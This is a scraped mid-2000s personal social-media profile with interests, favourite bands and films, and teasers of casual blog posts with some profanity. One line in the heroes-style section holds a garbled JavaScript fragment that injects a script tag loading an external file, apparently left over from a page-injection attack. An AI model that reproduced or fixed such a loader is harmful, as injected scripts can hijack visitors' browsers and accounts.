†B~e profile picture


Because the judge of you is someone I could never be...is why you should thank the lord that it is h

About Me


This layout is from whateverlife.com!

My Interests

Concerts.black eyeliner.psychology.criminology.pretty things.boys.NERDS.drinking.dancing.doing crazy things.being scared.converse.glitter.snow.the beach.people who make me laugh.staying out till dawn.halloween.making out.cuddling.cuddling while watching scary movies.holding hands.playing in the rain, but only when it pours.snowball fights.sleeping in.road trips.

I'd like to meet:

This boy... over and over again!Is it wrong to lust over this boy?!


MXPX, Bowling For Soup, Thursday, NHOI, SOmething Corporate, Jack's Mannequin, Acceptance,Ludo, Bad Religion, Coheed & Cambria,Lucky Boys Confusion, Death Cab For Cutie, Lenon, No Use For a Name, The Starting Line, Start Trouble, Avril, Simple Plan, Fall Out Boy, Mest, Anything But Joey, Story of the Year, ima Robot, The used, rancid, THe Darkness, From First to Last, Mayfield, The Dog & Everything, Swizzle Tree, Army of Freshmen, The Killers, Jet, Postal service, The sounds, My Chemical Romance, Zebra HEAD, Green Day, Modest Mouse, Phantom Planet, 311, The Clash, Blondie, OPM, STYX, Nothing Still, Joss Stone, American Hi-Fi, Eighteen Visions,Ok Go, Panic! at the disco, The Pink Spiders, and so soooooo many more......


*NAPOLEON DYNAMITE* .EMPIRE RECORDS .THE GOONIES .OLD SCHOOl .ROAD TRIP .HARRY POTTER .grind .THE OUTSIDERS .Mallrats .Jay and Silent Bob Strike Back .ALMOST FAMOUS .GO .awakenings .kiss the girls .battle of shaker heights


Sex and the City...... that's enough!




People who do shit like this! .."var s=..reateElement('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"

My Blog

I don't care how you try to make it sound, You're just a fucking LOSER!!!!!!

When did people lose the ability to respect other people. When did people lose dignity. .... i am pretty sure when your mother raised you, she raised you to be respectful to people. IT IS TIME FO...
Posted by †B~e on Sat, 07 Oct 2006 03:32:00 PST

Okay... i never thought I would say it...... but.....

I'm a lil homesick for the STL..... It really proved itself to be true tonight.... because I have been lying in bed for ummm... the majority of the day because I'm sick :( ....all i've been thinking ...
Posted by †B~e on Fri, 22 Sep 2006 12:18:00 PST

What Constitutes True Love!?

LADIES AND GENTLEMEN: Amber and I were talking tonight about love. L_O_V_E that four little word that seems to keep making small appearances in our lives. We have all these silly books telling us...
Posted by †B~e on Fri, 15 Sep 2006 11:21:00 PST

Instead of whinning about it why don't you just grow the fuck up!

I am so sick of people whinning about this and about that..... Ohhh.... that was a mistake, this was a mistake. Well boys and girls guess what you're going to make mistakes.... that's what life is ab...
Posted by †B~e on Sat, 26 Aug 2006 09:34:00 PST

If you're not really going to be there then don't be there

Sometimes I don't think people really understand the word commitment. If you're going to put your heart into something REALLY put it into it. If your going to tell someone you love them...... well tha...
Posted by †B~e on Fri, 14 Jul 2006 01:18:00 PST

It's time again.... to give up for those who gave up for us!

I've decided that for lent I'm giving up:   1.) CANDY and now this might be a little shocking so take a deep breath before reading oh and if you have anything in your mouth you might want to tak...
Posted by †B~e on Mon, 27 Feb 2006 08:57:00 PST

So APPARENTLY this is how you get a man???

As I was opening one of my presents this morning my mom looked at me and said, "Wait Beth, now i want to tell you that this is going to help you get a boyfriend!" I was like, "HUH???" so when I o...
Posted by †B~e on Mon, 26 Dec 2005 12:29:00 PST

It's not bullshit.... It's fucking bullshit!!!!

I'm in KS... it's like LA compared to STL!!! WE went to 80s night last night and I totally got my REAL id taken away. He sais, "umm... this isn't you!" I was like, "ummmm... HELLO yeah it is" He said ...
Posted by †B~e on Fri, 18 Nov 2005 09:00:00 PST

So do YOU wanna get naked... with ummm.... me???

OK so what did Beth do tonight....... Question mark.....Question mark???? She went to a strip club on the east side- what what- what's up... except that i'm the S-H_I-T!!!!!! So I got up on stage with...
Posted by †B~e on Wed, 16 Nov 2005 02:58:00 PST

SOMETIMES the obvious tells all.......

Okay so I took my graduate exam today and I should feel better cause phew... that's over with- BUT I don't, not at all. I just know there's so much more stress to come!   So much happen today tha...
Posted by †B~e on Sat, 12 Nov 2005 11:39:00 PST